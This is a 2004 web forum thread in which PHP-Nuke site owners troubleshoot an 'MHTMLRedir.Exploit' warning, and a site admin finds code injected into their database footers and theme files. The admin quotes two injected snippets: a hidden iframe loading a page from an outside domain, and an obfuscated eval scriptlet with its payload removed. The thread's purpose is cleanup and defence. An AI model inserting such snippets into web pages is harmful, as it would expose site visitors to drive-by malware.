Author |
Message |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Tue Nov 16, 2004 4:39 pm |
  |
I have a Nuke 7.1 site that has worked great for 6 months and now users that access the site on IE are getting a warning "MHTMLRedir.Exploit" virus has been detected.
How can I check to see if my site is affected?
Is there a way to check the files? I could not find any recent modifications to any of the files and the site works fine. |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Tue Nov 16, 2004 5:19 pm |
  |
|
     |
 |
Mesum
Support Staff


Joined: Mar 11, 2003
Posts: 842
Location: Chicago
|
Posted:
Tue Nov 16, 2004 5:51 pm |
  |
|
       |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Tue Nov 16, 2004 6:12 pm |
  |
Thanks for the replies.
No Ads on the site.
How can I check for the SQL injection?
Or any suggestions on the easiest solution?
I have had a few questions about new "pop ups" |
|
|
   |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Wed Nov 17, 2004 7:56 am |
  |
Evaders99 wrote: |
Probably an SQL injection - check your database, probably the messages or the footer |
How can I check for this - start searching the database dump for code?
What am I looking for in the SQL - data?
Any help to point me in the right direction is appreciated.
BTW - I only have 2 messages and the text looks fine, same with the footer - only short text there also - no code. |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Wed Nov 17, 2004 9:57 am |
  |
Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.
There are possibly other areas if your site has been compromised. I would scour your database and check everything out. |
_________________ Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding |
|
     |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Wed Nov 17, 2004 5:55 pm |
  |
Evaders99 wrote: |
Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.
There are possibly other areas if your site has been compromised. I would scour your database and check everything out. |
Thanks for the suggestions - Checked out the tables, not much there but simple text that matches the text entered on the web site by myself.
Users are reporting the warning as soon as they try to log in - I am at a loss as to where to check next.
I am willing to reinstall the whole site but will lose all the data - I guess I can choose a date before the Problem started and use that data.
I am still not sure what to look for in any of the tables.
Any way thanks for the replies! |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Wed Nov 17, 2004 6:21 pm |
  |
|
     |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Wed Nov 17, 2004 7:30 pm |
  |
This was added to your footer
Code: |
<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe><center>
|
I would check your database again. Possibly your theme template too |
_________________ Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding |
|
     |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Wed Nov 17, 2004 7:46 pm |
  |
Hey thanks a million!
I found it in the theme, header file.
Seems ok now
Much appreciated. |
|
|
   |
 |
ybrich
Nuke Soldier


Joined: May 25, 2003
Posts: 16
|
Posted:
Thu Nov 18, 2004 5:37 pm |
  |
mine was injected into the copywrite colum of the config..
 |
|
|
   |
 |
chukar
Nuke Cadet


Joined: Nov 19, 2004
Posts: 7
|
Posted:
Fri Nov 19, 2004 8:37 am |
  |
I'm also getting this problem with 7.2 and have searched for the above code but can't locate it.
I have the site secured by restricting my .htaccess file to my ip address, so it's hard to see how someone could get in and insert that code.
I'm mystified. |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Fri Nov 19, 2004 10:15 am |
  |
|
     |
 |
kewlbrew
Nuke Soldier


Joined: Sep 03, 2004
Posts: 22
|
Posted:
Fri Nov 19, 2004 1:25 pm |
  |
Im having the same trouble. Everytime anyone clicks anything they get a small pop up. I use Nuke 7.0 and checked my header file but didnt see anything. If anyone can take a look at the code its at www.gonewanderin.com/indexold.php I would appreciate it very much |
Last edited by kewlbrew on Sat Nov 20, 2004 6:55 am; edited 1 time in total |
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Fri Nov 19, 2004 1:57 pm |
  |
This was added to your footer:
Code: |
<TEXTAREA id=cxw style="DISPLAY: none"><object data="${PR}" id="obj1" type="text/x-scriptlet" width="0" height="0"></object></TEXTAREA><SCRIPT> </SCRIPT><script language='JavaScript'>eval(String.fromCharCode(**));</script>
|
Delete from your footer in your database. Read and secure your site: http://www.nukecops.com/postt32206.html
Edit: I went ahead and deleted the characters for **, so someone else cannot try to get this code. |
_________________ Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding |
|
     |
 |
|